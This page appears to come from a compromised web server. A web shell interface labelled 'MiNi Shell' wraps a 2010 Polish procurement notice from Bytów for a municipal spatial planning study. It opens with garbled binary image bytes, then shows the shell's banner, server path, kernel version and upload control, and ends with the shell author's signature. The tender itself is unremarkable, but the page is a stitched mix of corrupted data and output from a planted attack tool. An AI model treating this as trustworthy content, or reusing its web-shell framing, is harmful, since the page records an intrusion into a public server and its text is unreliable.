JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/106291-N-2010.html

<p class="kh_header"><b>Bytów: Sporządzenie opracowania - studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Bytów</b><br>
<b>Numer ogłoszenia: 106291 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Bytów , ul. 1-go Maja 15, 77-100 Bytów, woj. pomorskie, tel. 059 822 20 11, faks 059 822 25 92.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie opracowania - studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Bytów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sporządzenie opracowania: Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Bytów. Teren opracowania obejmuje powierzchnię 19.692 ha. 
1.1.	Studium należy sporządzić na podstawie aktualnie obowiązujących aktów prawnych:
- ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz. 717 z późn. zm.)
- rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz.U. nr 118, poz. 1233),
- uchwały Nr XXXIX/318/09 Rady Miejskiej w Bytowie z dnia 28 października 2009 r. w sprawie przystąpienia do sporządzenia studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Bytów,
- przepisów szczególnych dotyczących ochrony środowiska, przyrody, zabytków, prawa wodnego, ochrony gruntów rolnych i leśnych, itd.
1.2. W przypadku, gdy w trakcie sporządzania studium nastąpią zmiany w istotnych z uwagi na przedmiot opracowania aktach prawnych, np. w ustawie o planowaniu i zagospodarowaniu przestrzennym, Wykonawca zobowiązany jest do doprowadzenia projektu studium do stanu zgodności z wprowadzanymi zmianami w ramach ustalonej w drodze przetargu wysokości wynagrodzenia. Jednakże, w sytuacji konieczności wprowadzenia zmian w projekcie studium na skutek spowodowanego zmianą przepisów ponowienia dokonanych wcześniej uzgodnień, dopuszcza się możliwość spisania aneksu do umowy w zakresie zmiany terminu umowy oraz wysokości wynagrodzenia, którego wzrost nie może przekroczyć 20%.

2.	W ramach przedmiotu zamówienia Wykonawca sporządzi i przekaże Zamawiającemu:
2.1.	kompletny projekt uchwały w sprawie uchwalenia studium zawierającego część tekstową i graficzną
2.2.	prognozę oddziaływania na środowisko
2.3.	opracowanie ekofizjograficzne
2.4.	opracowania graficzne informacji planistycznych stanowiących zasób materiałów  wyjściowych i analiz, w tym m.in. z zakresu:
- uwarunkowań przyrodniczych, kierunków ochrony i kształtowania środowiska przyrodniczego, zasobów krajobrazu kulturowego
	- zasobów dziedzictwa kulturowego i zabytków
	- infrastruktury technicznej i komunikacji
	- rolniczej i leśnej przestrzeni produkcyjnej
	- uwarunkowań formalno-prawnych 
	- inwentaryzacji urbanistycznej

3. Zamawiający oczekuje, iż rysunek studium zostanie sporządzony w następującej formie:
3.1. załącznik graficzny nr 1 - plansza podstawowa obejmująca teren miasta i gminy, wykonana na mapie topograficznej w skali 1:10000
3.2. załącznik graficzny nr 2 - plansze sekcyjne wykonane na mapie topograficznej z naniesionymi granicami i numerami działek w skali 1:5000; jednakowa wielkość kolejnych sekcji zostanie ustalona w drodze podziału (przedstawionego na załączniku graficznym nr 1) obejmującego cały obszar studium i oznaczona kolejno jako: załącznik graficzny nr 2 - sekcja 1 (2,3,4,)  


4. Wykonawca przekaże Zamawiającemu projekt uchwały w sprawie uchwalenia studium w następującej formie:

4.1. w formie papierowej edytowanej w formacie A4 zawierającej tekst oraz kolorowe rysunki studium w skali 1:10000 (w pomniejszonym formacie) i 1:5000 (w pomniejszonym formacie) w ilości 7 (siedmiu) egzemplarzy;

4.2. w formie papierowej kolorowe wydruki rysunków studium w skalach właściwych, w ilości po 1 egz. każdego z rysunków;

4.3. w formie planszy do zawieszenia na ścianie, zawierającej papierowy kolorowy wydruk załącznika graficznego nr 1 w skali 1:10000, naklejony na płótno;  

4.4. w formie elektronicznego zapisu na płytach CD w ilości 3 (trzech) sztuk zawierających tekst i rysunki studium w formacie umożliwiającym odczyt oraz wydruk; 
format elektronicznego zapisu rysunków (*JPG, *tiff, *PDF) powinien:
- zawierać odrębne pliki dla całego obszaru studium wyrażonego na załączniku graficznym nr 1 w skali 1:10000 oraz dla poszczególnych sekcji składających się na załącznik graficzny nr 2 w skali 1:5000;  
- umożliwiać edycję (w postaci obrazu na ekranie oraz wydruku) całego rysunku lub jego części w dowolnej skali; 

5. Wykonawca sporządzi i przekaże zamawiającemu kompletną dokumentację formalno - prawną prac nad studium.

6. W ramach realizacji umowy Wykonawca jest zobowiązany do:
6.1. sporządzenia i prezentacji na sesji Rady Miejskiej analizy zmian w zagospodarowaniu przestrzennym gminy, zawierającej ocenę aktualności obowiązujących planów miejscowych, która wraz z wnioskami zgłoszonymi w trybie ustawowym i pozostałymi materiałami planistycznymi stanowić będzie podstawę do opracowania projektu studium; analiza, o której mowa powyżej zostanie zaprezentowana przed przystąpieniem do sporządzenia projektu studium a następnie przekazana Zamawiającemu w formie opracowania,
6.2. przygotowania i przekazania Zamawiającemu treści stosownych wystąpień do instytucji uzgadniających i opiniujących, komunikatów, obwieszczeń, tabel, pism niezbędnych w toku procedury studium do momentu stwierdzenia przez Wojewodę Pomorskiego zgodności z prawem podjętej przez Radę Miejską w Bytowie uchwały w sprawie uchwalenia studium,
6.3.  ustosunkowania się do uwag i poprawek zgłaszanych w odniesieniu do przedmiotu zamówienia przez Zamawiającego w okresie nie dłuższym niż 14 dni od daty ich przekazania,
6.4.  wniesienia poprawek i zmian do projektu, wynikających z treści uzgodnień i opinii oraz uwag Burmistrza Miasta Bytowa i Rady Miejskiej w Bytowie,
6.5.  wniesienia do projektu studium poprawek wynikających z uwzględnienia uwag w okresie wyłożenia do publicznego wglądu oraz przygotowania uzasadnienia w odniesieniu do uwag nieuwzględnionych,
6.6. prezentacji projektu studium na posiedzeniu Gminnej Komisji Urbanistyczno - Architektonicznej,
6.7.  prezentacji projektu studium i uczestnictwa w publicznej dyskusji na temat przyjętych w projekcie rozwiązań
6.8.  prezentacji projektu studium podczas posiedzeń komisji Rady Miejskiej
6.9.  prezentacji projektu studium podczas sesji Rady Miejskiej 
6.10. skompletowania dokumentacji planistycznej w sposób umożliwiający jej przekazanie Wojewodzie Pomorskiemu w celu oceny zgodności z prawem podjętej uchwały w sprawie uchwalenia studium
6.11. uzupełnienia projektu lub wniesienia poprawek w przypadku stwierdzenia przez Wojewodę Pomorskiego niezgodności z prawem podjętej uchwały.

7. Materiały niezbędne do wykonania przedmiotu zamówienia, w tym kopię mapy, na której zostanie sporządzony rysunek studium, Wykonawca pozyska we własnym zakresie. Koszt pozyskania tychże materiałów zawiera się w kwocie wynagrodzenia za wykonanie przedmiotu umowy. 

8. Wykonawca otrzyma materiały planistyczne znajdujące się w posiadaniu Zamawiającego, mogące służyć w opracowaniu przedmiotu zamówienia po podpisaniu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonali i uchwalili w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 4 opracowania planistyczne, takie jak: studium uwarunkowań i kierunków zagospodarowania przestrzennego lub miejscowy plan zagospodarowania przestrzennego z zastrzeżeniem, iż co najmniej jedno z tych opracowań obejmowało również obszary miejskie o powierzchni nie mniejszej niż 100 ha,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zapewnią udział w pracach zespołu:
	a) co najmniej dwóch projektantów urbanistów, z których jeden na  stanowisku głównego projektanta posiada uprawnienia do projektowania w planowaniu przestrzennym wynikające z aktualnego wpisu na listę członków właściwej Izby Urbanistów oraz doświadczenie w kierowaniu pracami przy co najmniej 5 opracowaniach planistycznych, takich jak: studium uwarunkowań i kierunków zagospodarowania przestrzennego lub jego zmiana oraz miejscowy plan zagospodarowania przestrzennego lub jego zmiana z zastrzeżeniem, iż co najmniej jedno z tych opracowań obejmowało również obszary miejskie o powierzchni nie mniejszej niż 100 ha,
b)	 projektantów specjalistów we wszystkich dziedzinach związanych z przedmiotem zamówienia, a w szczególności w specjalności: drogowej, przyrodniczej, inżynierii sanitarnej, elektroenergetycznej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy  gdy : 
1.	 w trakcie sporządzania studium nastąpią zmiany w istotnych z uwagi na przedmiot opracowania aktach prawnych, np. w ustawie o planowaniu i zagospodarowaniu przestrzennym, Wykonawca zobowiązany jest do doprowadzenia projektu studium do stanu zgodności z wprowadzanymi zmianami w ramach ustalonej w drodze przetargu wysokości wynagrodzenia.
2.	Ustala się, iż w sytuacji konieczności wprowadzenia zmian w projekcie studium na skutek spowodowanego zmianą przepisów ponowienia dokonanych wcześniej uzgodnień, dopuszcza się możliwość spisania aneksu do umowy w zakresie zmiany terminu umowy oraz wysokości wynagrodzenia, którego wzrost nie może przekroczyć 20%.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bytow.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
77-100 Bytów, ul. 1-go Maja 15, pok. nr 40.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2010 godzina 09:45, miejsce: sekretariat Urzędu Miejskiego 
77-100 Bytów, ul. 1-go maja 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com